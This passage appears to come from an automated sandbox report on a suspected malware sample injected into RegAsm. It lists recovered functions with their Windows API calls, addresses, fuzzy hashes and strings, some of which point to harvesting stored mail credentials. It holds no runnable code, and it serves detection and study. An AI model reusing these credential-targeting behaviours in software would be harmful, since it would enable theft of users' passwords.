                                                                                                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoad
                                                                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                              • API String ID: 534179979-1506664499
                                                                                                                                              • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                              • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                              • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                              • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$_mbscat
                                                                                                                                              • String ID: 3CD
                                                                                                                                              • API String ID: 3951308622-1938365332
                                                                                                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscat$_mbscpy
                                                                                                                                              • String ID: Password2
                                                                                                                                              • API String ID: 2600922555-1856559283
                                                                                                                                              • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                              • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                              • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                              • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: rows deleted
                                                                                                                                              • API String ID: 2221118986-571615504
                                                                                                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                              • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                              • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                              • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3384217055-0
                                                                                                                                              • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                              • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                              • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                              • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                              • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                              • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004048C2
                                                                                                                                              • memset.MSVCRT ref: 004048D6
                                                                                                                                              • memset.MSVCRT ref: 004048EA
                                                                                                                                              • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                              • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                              • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                              • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                              • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                              • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040D2C2
                                                                                                                                              • memset.MSVCRT ref: 0040D2D8
                                                                                                                                              • memset.MSVCRT ref: 0040D2EA
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                              • memset.MSVCRT ref: 0040D319
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                              APIs
                                                                                                                                              • __allrem.LIBCMT ref: 00425850
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                              • __allrem.LIBCMT ref: 00425933
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                              • API String ID: 2221118986-515162456
                                                                                                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: $, $CREATE TABLE
                                                                                                                                              • API String ID: 3510742995-3459038510
                                                                                                                                              • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                              • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                              • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                              • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                              • memset.MSVCRT ref: 004026AD
                                                                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3503910906-0
                                                                                                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040C922
                                                                                                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                              • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$MenuPostSendStringmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3798638045-0
                                                                                                                                              • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                              • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                              • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                              • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                              • strlen.MSVCRT ref: 0040B60B
                                                                                                                                              • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4107816708-0
                                                                                                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                              • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                              • strftime.MSVCRT ref: 00411476
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1886415126-0
                                                                                                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen
                                                                                                                                              • String ID: >$>$>
                                                                                                                                              • API String ID: 39653677-3911187716
                                                                                                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                              APIs
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                              • memset.MSVCRT ref: 00407FEA
                                                                                                                                              • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1865533344-0
                                                                                                                                              • Opcode ID: bfbd24b6eb9f059b1fc6dbc4b2d82ea2ef06db4a5dbaa2566208e2b96fd1a008
                                                                                                                                              • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                              • Opcode Fuzzy Hash: bfbd24b6eb9f059b1fc6dbc4b2d82ea2ef06db4a5dbaa2566208e2b96fd1a008
                                                                                                                                              • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi
                                                                                                                                              • String ID: C@$mail.identity
                                                                                                                                              • API String ID: 1439213657-721921413
                                                                                                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                              APIs
                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                              • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                              • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1479990042-0
                                                                                                                                              • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                              • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                              • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                              • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00406640
                                                                                                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                              • memcmp.MSVCRT ref: 00406672
                                                                                                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset$memcmp
                                                                                                                                              • String ID: Ul@
                                                                                                                                              • API String ID: 270934217-715280498
                                                                                                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
